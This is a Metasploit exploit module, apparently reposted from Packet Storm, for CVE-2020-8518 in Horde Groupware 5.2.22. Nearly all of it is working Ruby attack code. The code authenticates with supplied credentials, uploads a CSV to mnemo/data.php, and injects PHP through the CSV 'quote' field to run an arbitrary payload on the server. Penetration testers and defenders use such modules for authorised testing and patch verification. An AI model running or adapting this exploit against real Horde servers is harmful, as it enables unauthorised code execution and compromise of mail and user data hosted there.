Horde 5.2.22 CSV Import Code Execution ≈ Packet Storm

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(
update_info(
info,
'Name' => 'Horde CSV import arbitrary PHP code execution',
'Description' => %q{

The Horde_Data module version 2.1.4 (and before) present in Horde
Groupware version 5.2.22 allows authenticated users to inject
arbitrary PHP code thus achieving RCE on the server hosting the web
application.

},
'License' => MSF_LICENSE,
'Author' => ['Andrea Cardaci <Cette adresse e-mail est protégée contre les robots spammeurs. Vous devez activer le JavaScript pour la visualiser.>'],
'References' => [
['CVE', '2020-8518'],
['URL', 'https://cardaci.xyz/advisories/2020/03/10/horde-groupware-webmail-edition-5.2.22-rce-in-csv-data-import/']
],
'DisclosureDate' => '2020-02-07',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Payload' => {'BadChars' => "'"},
'Privileged' => false,
'DefaultOptions' => { 'PrependFork' => true },
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
])
end

def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'login.php'),
'cookie' => 'Horde=x', # avoid multiple Set-Cookie
'vars_post' => {
'horde_user' => username,
'horde_pass' => password,
'login_post' => '1'})
unless res && res.code == 302 && res.headers['Location'].include?('/services/portal/')
fail_with(Failure::UnexpectedReply, 'Login failed or application not found')
end

vprint_good("Logged in as #{username}:#{password}")
return res.get_cookies
end

def upload_csv(cookie)
csv_fname = Rex::Text.rand_text_alpha(6..8)

data = Rex::MIME::Message.new
data.add_part('11', nil, nil, 'form-data; name="actionID"')
data.add_part('1', nil, nil, 'form-data; name="import_step"')
data.add_part('csv', nil, nil, 'form-data; name="import_format"')
data.add_part('x', nil, nil, 'form-data; name="notepad_target"')
data.add_part(csv_fname, nil, nil, "form-data; name=\"import_file\"; filename=\"#{csv_fname}\"")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'mnemo/data.php'),
'cookie' => cookie,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s)

vprint_status("Uploading #{csv_fname}.csv")

unless res && res.code == 200
fail_with(Failure::UnexpectedReply, 'Cannot upload the CSV file')
end

vprint_good('CSV file uploaded')
end

def execute(cookie, function_call)
options = {
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'mnemo/data.php'),
'cookie' => cookie,
'vars_post' => {
'actionID' => '3',
'import_step' => '2',
'import_format' => 'csv',
'header' => '1',
'fields' => '1',
'sep' => 'x',
'quote' => ").#{function_call}.die();}//\\"}}

send_request_cgi(options)
end

def exploit
cookie = login()
upload_csv(cookie)
# do not terminate the statement
function_call = payload.encoded.tr(';', '')
vprint_status("Sending payload: #{function_call}")
execute(cookie, function_call)
end
end

Read more